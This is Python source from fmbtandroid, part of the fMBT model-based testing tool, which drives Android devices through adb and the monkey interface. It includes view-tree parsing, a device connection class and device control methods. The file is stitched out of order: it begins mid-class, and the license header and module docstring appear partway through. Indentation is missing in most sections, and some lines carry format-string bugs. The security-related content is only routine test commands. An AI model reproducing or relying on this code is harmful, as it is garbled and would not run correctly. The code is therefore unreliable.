    def dumpItems(self, itemList = None):
        # One line per item; defaults to all parsed items.
        if itemList == None: itemList = self._viewItems
        l = []
        for i in itemList:
            l.append(self._dumpItem(i))
        return '\n'.join(l)
    def dumpTree(self, rootItem = None):
        # Indented dump of the item hierarchy, starting from rootItem or
        # from all indent-0 items.
        l = []
        if rootItem != None:
            l.extend(self._dumpSubTree(rootItem, 0))
        else:
            for i in self._viewItems:
                if i._indent == 0:
                    l.extend(self._dumpSubTree(i, 0))
        return '\n'.join(l)
    def _dumpSubTree(self, viewItem, indent):
        l = []
        l.append(" "*indent + self._dumpItem(viewItem))
        for i in viewItem.children():
            l.extend(self._dumpSubTree(i, indent + 4))
        return l
    def _dumpItem(self, viewItem):
        i = viewItem
        if i.text() != None: t = '"%s"' % (i.text(),)
        else: t = None
        return "id=%s cls=%s text=%s bbox=%s" % (
            i.id(), i.className(), t, i.bbox())
    def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
        """
        Returns at most count items for which comparator(item) is True.
        count=-1 means no limit. Searches searchRootItem and its
        children, or searchItems, or all parsed items.
        """
        foundItems = []
        if count == 0: return foundItems
        if searchRootItem != None:
            # find from searchRootItem and its children
            # BUGFIX: used to append undefined name "i" (NameError at
            # runtime); append the matching root item itself.
            if comparator(searchRootItem):
                foundItems.append(searchRootItem)
            for c in searchRootItem.children():
                foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
        else:
            if searchItems != None:
                # find from listed items only
                searchDomain = searchItems
            else:
                # find from all items
                searchDomain = self._viewItems
            for i in searchDomain:
                if comparator(i):
                    foundItems.append(i)
                    if count > 0 and len(foundItems) >= count:
                        break
        return foundItems
    def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
        """
        Searches the GUI hierarchy for objects with the given text.
        """
        if partial:
            c = lambda item: (
                item.properties().get("text:mText", "").find(text) != -1 )
        else:
            c = lambda item: (
                item.properties().get("text:mText", None) == text )
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsById(self, id, count=-1, searchRootItem=None, searchItems=None):
        c = lambda item: item.properties().get("mID", "") == id
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByClass(self, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
        if partial: c = lambda item: item.className().find(className) != -1
        else: c = lambda item: item.className() == className
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def findItemsByIdAndClass(self, id, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
        # First filter by id, then by class within the id matches.
        idOk = self.findItemsById(id, count=-1, searchRootItem=searchRootItem)
        return self.findItemsByClass(className, partial=partial, count=count, searchItems=idOk)
    def findItemsByRawProps(self, s, count=-1, searchRootItem=None, searchItems=None):
        c = lambda item: item._rawProps.find(s) != -1
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
    def save(self, fileOrDirName):
        # Copy the raw dump file for later inspection.
        shutil.copy(self._rawDumpFilename, fileOrDirName)
    def _parseDump(self, dump):
        """
        Process the raw dump data and create a tree of ViewItems
        """
        # This code originates from tema-android-adapter-3.2,
        # AndroidAdapter/guireader.py. Unused locals (cellLayout,
        # previousItem, visible, x, y) have been removed.
        self._viewItems = []
        parent = None
        currentIndent = 0
        self.TOP_PAGED_VIEW = ""
        for lineIndex, line in enumerate(dump.splitlines()):
            if line == "DONE.":
                break
            # separate indent, class and properties for each GUI object
            # TODO: branch here according to self._androidVersion
            matcher = self._lineRegEx.match(line)
            if not matcher:
                # FIXME: this hack falls back to old format,
                # should branch according to self._androidVersion!
                matcher = self._olderAndroidLineRegEx.match(line)
                if not matcher:
                    self._errors.append((lineIndex + 1, line, "Illegal line"))
                    continue # skip this line
            # Indent specifies the hierarchy level of the object
            indent = len(matcher.group("indent"))
            # If the indent is bigger than previous, this object is a
            # child of the previous object
            if indent > currentIndent:
                parent = self._viewItems[-1]
            elif indent < currentIndent:
                for tmp in range(0, currentIndent - indent):
                    parent = parent.parent()
            currentIndent = indent
            propertiesData = matcher.group("properties")
            properties = {}
            index = 0
            # Process the properties of each GUI object
            while index < len(propertiesData):
                # Separate name and value for each property [^=]*=
                propMatch = self._propRegEx.match(propertiesData[index:-1])
                # BUGFIX: a non-matching property used to fall through to
                # propMatch.group(...) and crash with AttributeError;
                # record a parse error instead.
                if not propMatch or not propMatch.group("data"):
                    self._errors.append((lineIndex, propertiesData[index:-1], "Illegal property"))
                    return None
                if len(propMatch.group("data")) < int(propMatch.group("len")):
                    # Declared length exceeds matched data: take the
                    # bytes straight from propertiesData.
                    startFrom = index + propertiesData[index:-1].find(propMatch.group("data"))
                    currFixedData = propertiesData[startFrom:(startFrom + int(propMatch.group("len")))]
                    length = int(propMatch.group("len"))
                    # [^=]+=?, == data
                    properties[propMatch.group("name")] = currFixedData[0:length].lstrip()
                else:
                    length = int(propMatch.group("len"))
                    # [^=]+=?, == data
                    properties[propMatch.group("name")] = propMatch.group("data")[0:length].lstrip()
                index += len(propMatch.group("prop")) + length + 1
            self._viewItems.append(ViewItem(matcher.group("class"), matcher.group("id"), indent, properties, parent, matcher.group("properties")))
            if parent:
                parent.addChild(self._viewItems[-1])
        return self._viewItems
    def __str__(self):
        return 'View(items=%s, dump="%s")' % (
            len(self._viewItems), self._rawDumpFilename)
class _AndroidDeviceConnection:
"""
Connection to the Android Device being tested.
"""
_m_host = 'localhost'
_m_port = random.randint(20000, 29999)
_w_host = 'localhost'
_w_port = _m_port + 1
def __init__(self, serialNumber, stopOnError=True):
self._serialNumber = serialNumber
self._stopOnError = stopOnError
self._shellSupportsTar = False
try:
self._resetMonkey()
self._resetWindow()
# check supported features
outputLines = self._runAdb("shell tar")[1].splitlines()
if len(outputLines) == 1 and "bin" in outputLines[0]:
self._shellSupportsTar = False
else:
self._shellSupportsTar = True
finally:
# Next _AndroidDeviceConnection instance will use different ports
self._w_port = _AndroidDeviceConnection._w_port
self._m_port = _AndroidDeviceConnection._m_port
_AndroidDeviceConnection._w_port += 100
_AndroidDeviceConnection._m_port += 100
def __del__(self):
try: self._monkeySocket.close()
except: pass
def _cat(self, remoteFilename):
fd, filename = tempfile.mkstemp("fmbtandroid-cat-")
os.close(fd)
self._runAdb("pull '%s' %s" % (remoteFilename, filename), 0)
contents = file(filename).read()
os.remove(filename)
return contents
def _runAdb(self, command, expectedExitStatus=0):
if not self._stopOnError:
expect = None
else:
expect = expectedExitStatus
if type(command) == list:
command = ["adb", "-s", self._serialNumber] + command
else:
command = ("adb -s '%s' " % (self._serialNumber,)) + command
return _run(command, expectedExitStatus = expect)
def _runSetupCmd(self, cmd, expectedExitStatus = 0):
_adapterLog('setting up connections: "%s"' % (cmd,))
exitStatus, _, _ = self._runAdb(cmd, expectedExitStatus)
if exitStatus == 0: return True
else: return True
def _resetWindow(self):
setupCommands = ["shell service call window 1 i32 4939",
"forward tcp:%s tcp:4939" % (self._w_port,)]
for c in setupCommands:
self._runSetupCmd(c)
def _resetMonkey(self, timeout=3, pollDelay=.25):
self._runSetupCmd("shell monkey --port 1080", None)
time.sleep(pollDelay)
endTime = time.time() + timeout
while time.time() < endTime:
self._runSetupCmd("forward tcp:%s tcp:1080" % (self._m_port,), 0)
try:
self._monkeySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._monkeySocket.connect((self._m_host, self._m_port))
self._monkeySocket.setblocking(0)
self._monkeySocket.settimeout(1.0)
self._platformVersion = self._monkeyCommand("getvar build.version.release", retry=0)[1]
if len(self._platformVersion) > 0:
self._monkeySocket.settimeout(5.0)
return True
except Exception, e:
pass
time.sleep(pollDelay)
if self._stopOnError:
msg = 'Android monkey error: cannot connect to "adb shell monkey --port 1080" to device %s' % (self._serialNumber)
_adapterLog(msg)
raise AndroidConnectionError(msg)
else:
return False
def _monkeyCommand(self, command, retry=3):
try:
self._monkeySocket.sendall(command + "\n")
data = self._monkeySocket.recv(4096).strip()
if len(data) == 0 and retry > 0:
return self._monkeyCommand(command, retry-1)
if data == "OK":
return True, None
elif data.startswith("OK:"):
return True, data.split("OK:")[1]
_adapterLog("monkeyCommand failing... command: '%s' response: '%s'" % (command, data))
return False, None
except socket.error:
try: self.sock.close()
except: pass
if retry > 0:
self._resetMonkey()
return self._monkeyCommand(command, retry=retry-1)
else:
raise AndroidConnectionError('Android monkey socket connection lost while sending command "%s"' % (command,))
def reboot(self, reconnect, firstBootAfterFlashing, timeout):
if firstBootAfterFlashing:
self._runAdb("root")
time.sleep(2)
self._runAdb("shell rm /data/data/com.android.launcher/shared_prefs/com.android.launcher2.prefs.xml")
self._runAdb("reboot")
_adapterLog("rebooting " + self._serialNumber)
if reconnect:
self._runAdb("wait-for-device")
endTime = time.time() + timeout
while time.time() < endTime:
try:
if self._resetMonkey(timeout=1, pollDelay=1):
break
except AndroidConnectionError:
pass
time.sleep(1)
else:
_adapterLog("reboot: reconnecting to " + self._serialNumber + " failed")
return False
self._resetWindow()
return True
def recvVariable(self, variableName):
ok, value = self._monkeyCommand("getvar " + variableName)
if ok: return value
else:
# LOG: getvar variableName failed
return None
def recvScreenSize(self):
try:
height = int(self.recvVariable("display.height"))
width = int(self.recvVariable("display.width"))
except TypeError:
return None, None
return width, height
def recvTopAppWindow(self):
_, output, _ = self._runAdb("shell dumpsys window", 0)
if self._platformVersion >= "4.2":
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8})( [^ ]*)? (?P<winName>[^}]*)\}", output)
else:
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8}) (?P<winName>[^ ]*) [^ ]*\}", output)
if s and len(s[0][-1].strip()) > 1: topWindowName = s[0][-1]
else: topWindowName = None
s = re.findall("mFocusedApp=AppWindowToken.*ActivityRecord\{#?[0-9A-Fa-f]{8}( [^ ]*)? (?P<appName>[^}]*)\}", output)
if s and len(s[0][-1].strip()) > 1:
topAppName = s[0][-1].strip()
else:
topAppName = None
return topAppName, topWindowName
def sendTap(self, xCoord, yCoord):
return self._monkeyCommand("tap " + str(xCoord) + " " + str(yCoord))[0]
def sendKeyUp(self, key):
return self._monkeyCommand("key up " + key)[0]
def sendKeyDown(self, key):
return self._monkeyCommand("key down " + key)[0]
def sendTouchUp(self, xCoord, yCoord):
return self._monkeyCommand("touch up " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchDown(self, xCoord, yCoord):
return self._monkeyCommand("touch down " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchMove(self, xCoord, yCoord):
return self._monkeyCommand("touch move " + str(xCoord) + " " + str(yCoord))[0]
def sendTrackBallMove(self, dx, dy):
return self._monkeyCommand("trackball " + str(dx) + " " + str(dy))[0]
def sendPress(self, key):
return self._monkeyCommand("press " + key)[0]
def sendType(self, text):
return self._monkeyCommand("type " + text)[0]
def screenshot(self, screenshotDir=None, imageFilename=None):
"""
Capture a screenshot and copy the image file to given path or
system temp folder.
Returns screenshot filename.
"""
if imageFilename == None:
filename = _filenameTimestamp() + "-" + self._serialNumber + '.png'
else:
filename = imageFilename
remotefile = '/sdcard/' + filename
status, _, _ = self._runAdb(['shell', 'screencap', '-p', remotefile], 0)
if status != 0: return None
if screenshotDir == None:
status, _, _ = self._runAdb(['pull', remotefile, tempfile.gettempdir()], 0)
else:
status, _, _ = self._runAdb(['pull', remotefile, os.path.join(screenshotDir, filename)], 0)
if status != 0: return None
status, _, _ = self._runAdb(['shell','rm', remotefile], 0)
if screenshotDir == None:
return os.path.join(tempfile.gettempdir(), filename)
else:
return os.path.join(screenshotDir, filename)
def shellSOE(self, shellCommand):
fd, filename = tempfile.mkstemp(prefix="fmbtandroid-shellcmd-")
remotename = '/sdcard/' + os.path.basename(filename)
os.write(fd, shellCommand + "\n")
os.close(fd)
self._runAdb("push %s %s" % (filename, remotename), 0)
cmd = "shell 'source %s >%s.out 2>%s.err; echo $? > %s.status" % ((remotename,)*4)
if self._shellSupportsTar:
# do everything we can in one command to minimise adb
# commands: execute command, record results, package,
# print uuencoded package and remove remote temp files
cmd += "; cd %s; tar czf - %s.out %s.err %s.status | uuencode %s.tar.gz; rm -f %s*'" % (
(os.path.dirname(remotename),) + ((os.path.basename(remotename),) * 5))
status, output, error = self._runAdb(cmd, 0)
file(filename, "w").write(output)
uu.decode(filename, out_file=filename + ".tar.gz")
import tarfile
tar = tarfile.open(filename + ".tar.gz")
basename = os.path.basename(filename)
stdout = tar.extractfile(basename + ".out").read()
stderr = tar.extractfile(basename + ".err").read()
try: exitstatus = int(tar.extractfile(basename + ".status").read())
except: exitstatus = None
os.remove(filename)
os.remove(filename + ".tar.gz")
else:
# need to pull files one by one, slow.
cmd += "'"
self._runAdb(cmd, 0)
stdout = self._cat(remotename + ".out")
stderr = self._cat(remotename + ".err")
try: exitstatus = int(self._cat(remotename + ".status"))
except: exitstatus = None
self._runAdb("shell rm -f %s.out %s.err %.status" % ((remotename,)*3))
return exitstatus, stdout, stderr
def recvViewData(self, retry=3):
_dataBufferLen = 4096 * 16
try:
self._windowSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._windowSocket.connect( (self._w_host, self._w_port) )
# DUMP -1: get foreground window info
if self._windowSocket.sendall("DUMP -1\n") == 0:
# LOG: readGUI cannot write to window socket
raise AdapterConnectionError("writing socket failed")
# Read until a "DONE" line
data = ""
while True:
try: newData = self._windowSocket.recv(_dataBufferLen)
except socket.timeout:
continue
data += newData
if data.splitlines()[-1] == "DONE" or newData == '':
break
return data
except Exception, msg:
_adapterLog("recvViewData: window socket error: %s" % (msg,))
if retry > 0:
self._resetWindow()
return self.recvViewData(retry=retry-1)
else:
msg = "recvViewData: cannot read window socket"
_adapterLog(msg)
raise AndroidConnectionError(msg)
finally:
try: self._windowSocket.close()
except: pass
# Exception hierarchy for Android device connection failures; the two
# subclasses are not raised in this chunk — presumably raised by callers
# elsewhere.
class AndroidConnectionError(Exception): pass
class AndroidConnectionLost(AndroidConnectionError): pass
class AndroidDeviceNotFound(AndroidConnectionError): pass
# fmbtandroid: fixed tapBitmap colorMatch and area parameters
# fMBT, free Model Based Testing tool
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for
# more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
#
# View._parseDump method contains code that has been published as part
# of the TEMA tool, under the MIT open source license:
#
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This library provides a test interface to Android devices.
Device class implements a test interface that is based on Android
Debug Bridge (adb) and Android monkey.
Device's refreshScreenshot() returns a Screenshot object, from which
bitmaps can be searched for.
Device's refreshView() returns a View object, from which UI elements
can be searched according to their id, class, text and other
properties.
Using this library requires that adb is in PATH.
Tips & tricks
-------------
Take a screenshot and save it to a file
import fmbtandroid
fmbtandroid.Device().refreshScreenshot().save("/tmp/screen.png")
* * *
Print view items on device display
import fmbtandroid
print fmbtandroid.Device().refreshView().dumpTree()
* * *
Save generated device ini for modifications
import fmbtandroid
file("/tmp/mydevice.ini", "w").write(fmbtandroid.Device().dumpIni())
* * *
Connect to device based on an ini file
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.pressHome()
* * *
Open screenlock by swiping lock.png bitmap on the display to the
east. The lock.png file needs to be in bitmapPath defined in
mydevice.ini.
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.refreshScreenshot()
d.swipeBitmap("lock.png", "east")
* * *
Execute a shell command on Android device, show exit status, standard
output and standard error:
import fmbtandroid
status, out, err = fmbtandroid.Device().shellSOE("mkdir /proc/foo")
print 'status: %s, stdout: "%s", stderr: "%s"' % (status, out, err)
* * *
Enable extensive logging with fmbtlogger. You can use functions or
file objects as backends. Example: log to standard output
import fmbtandroid
import fmbtlogger
import sys
d = fmbtandroid.Device()
d = fmbtlogger.text(d, sys.stdout, logDepth=-1)
d.pressPower()
"""
DEVICE_INI_DEFAULTS = '''
[objects]
appsButtonId = id/0x0
appsButtonClass = BubbleTextView
; [application.NAME] sections:
; gridname = exact caption of the application in application grid (text
; property)
; window = string included in topWindow() when application is running
[homescreen]
window = Launcher
'''
import commands
import datetime
import os
import random
import re
import shutil
import socket
import StringIO
import subprocess
import tempfile
import time
import uu
import eyenfinger
import fmbt
_OCRPREPROCESS = [
'-sharpen 5 -level 60%%,60%%,1.0 -filter Mitchell %(zoom)s',
'-sharpen 5 -level 90%%,100%%,3.0 -filter Mitchell -sharpen 5'
]
def _adapterLog(msg):
    """Write msg to the fMBT adapter log, tagged with this module's name."""
    tagged = "fmbtandroid: %s" % (msg,)
    fmbt.adapterlog(tagged)
def _logFailedCommand(source, command, exitstatus, stdout, stderr):
    """Log a failed command together with its output, error and exit status."""
    message = ('in %s command "%s" failed:\n output: %s\n error: %s\n status: %s'
               % (source, command, stdout, stderr, exitstatus))
    _adapterLog(message)
def _fmbtLog(msg):
    """Write msg to the fMBT test run log, tagged with this module's name."""
    tagged = "fmbtandroid: %s" % (msg,)
    fmbt.fmbtlog(tagged)
def _filenameTimestamp():
return datetime.datetime.now().strftime("%Y%m%d-%H%M%S-%f")
def _run(command, expectedExitStatus = None):
    """
    Run command in a subprocess.

    command is either a string (executed through the shell) or a list
    of arguments (executed directly).

    If expectedExitStatus is given (an integer, or a list/tuple of
    accepted integers), stdout and stderr are collected and an
    exception is raised when the exit status is not among the accepted
    ones.

    Returns tuple (exitStatus, stdout, stderr).
    """
    if type(command) == str: shell=True
    else: shell=False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=True)
        if expectedExitStatus != None:
            out, err = p.communicate()
        else:
            # Caller does not care about the outcome: do not wait for
            # the process to finish.
            out, err = ('', None)
    except Exception, e:
        # Launching the process failed (e.g. command not found): fake
        # a process object carrying the shell's 127 exit status.
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    if expectedExitStatus != None:
        if ((type(expectedExitStatus) in [list, tuple] and
             not exitStatus in expectedExitStatus) or
            (type(expectedExitStatus) == int and
             not exitStatus == expectedExitStatus)):
            msg = 'Unexpected exit status %s from command "%s".\n Output: %s\n Error: %s' % (
                exitStatus, command, out, err)
            _adapterLog(msg)
            # NOTE(review): err can be an Exception instance in the
            # Popen-failure branch above; the "in" test then assumes
            # string-like behavior — confirm.
            if "error: device not found" in err:
                raise AndroidDeviceNotFound(msg)
            else:
                raise Exception(msg)
    return (exitStatus, out, err)
def _bitmapPathSolver(fmbtAndroidHomeDir, bitmapPath):
def _solver(bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
return _solver
class Device(object):
"""
The Device class provides
- keywords as its methods
- device properties from device's INI file
- view() returns the most recently refreshed View, that contains
items parsed from window dump.
- screenshot() returns the most recently refreshed Screenshot,
bitmaps can be searched from this.
"""
_PARSE_VIEW_RETRY_LIMIT = 10
def __init__(self, deviceName=None, iniFile=None, connect=True):
"""
Connect to given device, or the first not-connected Android
device in the "adb devices" list, if nothing is defined.
Parameters:
deviceName (string, optional):
If deviceName is a device serial number (an item in
the left most column in "adb devices"), connect to
that device. Device information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
If deviceName is a nick name, device information is
looked for from $FMBTANDROIDHOME/etc/deviceName.ini,
and the connection is established to the device with
the serial number given in the ini file.
The default is None. The first disconnected device
in the "adb devices" list is connected to. Device
information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
iniFile (file object, optional):
A file object that contains device information
ini. Connect to the device with a serial number
given in this file. The default is None.
To create an ini file for a device, use dumpIni. Example:
file("/tmp/test.ini", "w").write(fmbtandroid.Device().dumpIni())
"""
self._fmbtAndroidHomeDir = os.getenv("FMBTANDROIDHOME", os.getcwd())
self._screenSize = None
self._platformVersion = None
self._lastView = None
self._lastScreenshot = None
self._longPressHoldTime = 2.0
self._longTapHoldTime = 2.0
self._conf = _DeviceConf()
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
if deviceName == None:
deviceName = self._conf.value("general", "serial", None)
if connect == False and deviceName == None:
deviceName = "nodevice"
self._conn = None
elif deviceName == None:
# Connect to an unspecified device.
# Go through devices in "adb devices".
listDevicesCommand = "adb devices"
status, output, err = _run(listDevicesCommand, expectedExitStatus = [0, 127])
if status == 127:
raise Exception('adb not found in PATH. Check your Android SDK installation.')
outputLines = [l.strip() for l in output.splitlines()]
try: deviceLines = outputLines[outputLines.index("List of devices attached")+1:]
except: deviceLines = []
deviceLines = [l for l in deviceLines if l.strip() != ""]
if deviceLines == []:
raise Exception('No devices found with "%s"' % (listDevicesCommand,))
potentialDevices = [line.split()[0] for line in deviceLines]
for deviceName in potentialDevices:
try:
self.serialNumber = deviceName
self._conf.set("general", "serial", self.serialNumber)
self._conn = _AndroidDeviceConnection(self.serialNumber)
break
except AndroidConnectionError, e:
continue
else:
raise AndroidConnectionError("Could not connect to device(s): %s." % (
", ".join(potentialDevices)))
# Found a device (deviceName).
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
else:
# Device name given, find out the serial number to connect to.
# It may be given in device or test run INI files.
self.serialNumber = self._conf.value("general", "serial", deviceName)
if connect:
self._conn = _AndroidDeviceConnection(self.serialNumber)
_deviceIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
# Fetch properties from device configuration
self.nickName = self._conf.value("general", "name", deviceName)
self.phoneNumber = self._conf.value("general", "phonenumber")
# Loading platform-specific configuration requires a
# connection to the device for checking the platform version.
_platformIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + "android" + self.platformVersion() + ".ini"
# would we need a form-factor ini, too?
self.loadConfig(_platformIniFilename, override=False, level="platform")
self.loadConfig(StringIO.StringIO(DEVICE_INI_DEFAULTS), override=False, level="global default")
self.wlanAP = self._conf.value("environment", "wlanAP")
self.wlanPass = self._conf.value("environment", "wlanPass")
self.btName = self._conf.value("environment", "BTName")
self.btAccessory = self._conf.value("environment", "BTAccessory")
self.serverIP = self._conf.value("environment", "ServerIP")
self.androidUser = self._conf.value("environment", "AndroidUser")
self.voiceMailNumber = self._conf.value("environment", "VoiceMailNumber")
if self._conn: hw = self._conn._monkeyCommand("getvar build.device")[1]
else: hw = "nohardware"
self.hardware = self._conf.value("general", "hardware", hw)
self.bitmapPath = self._conf.value("paths", "bitmapPath", self._fmbtAndroidHomeDir + os.sep + "bitmaps" + os.sep + self.hardware + "-" + self.platformVersion() + ":.")
self.screenshotDir = self._conf.value("paths", "screenshotDir", self._fmbtAndroidHomeDir + os.sep + "screenshots")
if not os.path.isdir(self.screenshotDir):
try:
os.makedirs(self.screenshotDir)
_adapterLog('created directory "%s" for screenshots' % (self.screenshotDir,))
except Exception, e:
_adapterLog('creating directory "%s" for screenshots failed: %s' (self.screenshotDir, e))
raise
# Caches
self._itemCache = {}
def callContact(self, contact):
"""
Call to given contact.
Return True if successful, otherwise False.
"""
callCommand = 'service call phone 1 s16 "%s"' % (contact,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callContact", callCommand, status, out, err)
return False
else:
return True
def callNumber(self, number):
"""
Call to given phone number.
Return True if successful, otherwise False.
"""
callCommand = "service call phone 2 s16 %s" % (number,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callNumber", callCommand, status, out, err)
return False
else:
return True
def close(self):
if hasattr(self, "_conn"):
del self._conn
if hasattr(self, "_lastView"):
del self._lastView
if hasattr(self, "_lastScreenshot"):
del self._lastScreenshot
import gc
gc.collect()
def dumpIni(self):
"""
Returns contents of current device configuration as a string (in
INI format).
"""
return self._conf.dump()
    def drag(self, (x1, y1), (x2, y2), delayBetweenMoves=0.01, delayBeforeMoves=0, delayAfterMoves=0, movePoints=20):
        """
        Touch the screen on coordinates (x1, y1), drag along straight
        line to coordinates (x2, y2), and raise fingertip.

        coordinates (floats in range [0.0, 1.0] or integers):
                floating point coordinates in range [0.0, 1.0] are
                scaled to full screen width and height, others are
                handled as absolute coordinate values.

        delayBeforeMoves (float, optional):
                seconds to wait after touching and before dragging.

        delayBetweenMoves (float, optional):
                seconds to wait when moving between points when
                dragging.

        delayAfterMoves (float, optional):
                seconds to wait after dragging, before raising
                fingertip.

        movePoints (integer, optional):
                the number of intermediate move points between end
                points of the line.

        Returns True on success, False if sending input failed.
        """
        x1, y1 = self.intCoords((x1, y1))
        x2, y2 = self.intCoords((x2, y2))
        if not self._conn.sendTouchDown(x1, y1): return False
        time.sleep(delayBeforeMoves)
        # Send movePoints evenly-spaced intermediate points along the
        # line towards (x2, y2); the end point itself is sent by the
        # final touch-up below.
        for i in xrange(0, movePoints):
            nx = x1 + int(round(((x2 - x1) / float(movePoints+1)) * (i+1)))
            ny = y1 + int(round(((y2 - y1) / float(movePoints+1)) * (i+1)))
            if not self._conn.sendTouchMove(nx, ny): return False
            if i < movePoints - 1: time.sleep(delayBetweenMoves)
        time.sleep(delayAfterMoves)
        if self._conn.sendTouchUp(x2, y2): return True
        return False
    def intCoords(self, (x, y)):
        """
        Convert floating point coordinate values in range [0.0, 1.0] to
        screen coordinates.
        """
        width, height = self.screenSize()
        # Only floats in [0.0, 1.0] are scaled; integers (and floats
        # outside the range) are used as absolute pixel coordinates.
        if 0 <= x <= 1 and type(x) == float: x = x * width
        if 0 <= y <= 1 and type(y) == float: y = y * height
        return (int(round(x)), int(round(y)))
    def loadConfig(self, filenameOrObj, override=True, level=""):
        """
        Load device configuration from a file name or a file-like
        object.

        If override is True, values already in the configuration are
        replaced. level is a free-form string used only in log
        messages. Errors are logged and swallowed (best-effort load).
        """
        try:
            if type(filenameOrObj) == str:
                filename = filenameOrObj
                fileObj = file(filenameOrObj)
            else:
                fileObj = filenameOrObj
                filename = getattr(fileObj, "name", "<string>")
                # Rewind reusable file-like objects so that repeated
                # loads read from the beginning.
                if hasattr(fileObj, "seek"):
                    fileObj.seek(0)
            self._conf.addFile(fileObj, override=override)
        except Exception, e:
            _adapterLog('Loading %s configuration from "%s" failed: %s' % (level, filename, e))
            return
        _adapterLog('Loaded %s configuration from "%s"' % (level, filename))
def platformVersion(self):
"""
Returns the platform version of the device.
"""
if self._platformVersion == None:
if self._conn:
self._platformVersion = self._conn.recvVariable("build.version.release")
else:
self._platformVersion = "nosoftware"
return self._platformVersion
def pressBack(self, **pressKeyKwArgs):
"""
Press the back button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_BACK", **pressKeyKwArgs)
def pressHome(self, **pressKeyKwArgs):
"""
Press the home button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_HOME", **pressKeyKwArgs)
def pressKey(self, keyName, long=False, hold=0.0):
"""
Press a key on the device.
Parameters:
keyName (string):
the name of the key, like KEYCODE_HOME. If KEYCODE_
prefix is not given, it is added. Refer to Android
KeyEvent documentation.
long (boolean, optional):
if True, press the key for long time.
hold (float, optional):
time in seconds to hold the key down.
"""
if not keyName.upper().startswith("KEYCODE_"):
keyName = "KEYCODE_" + keyName
keyName = keyName.upper()
if long and hold == None:
hold = self._longPressHoldTime
if hold > 0.0:
try:
assert self._conn.sendKeyDown(keyName)
time.sleep(hold)
assert self._conn.sendKeyUp(keyName)
except:
return False
return True
return self._conn.sendPress(keyName)
def pressMenu(self, **pressKeyKwArgs):
"""
Press the menu button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_MENU", **pressKeyKwArgs)
def pressPower(self, **pressKeyKwArgs):
"""
Press the power button.
Optional parameters are the same as for pressKey.
"""
return self.pressKey("KEYCODE_POWER", **pressKeyKwArgs)
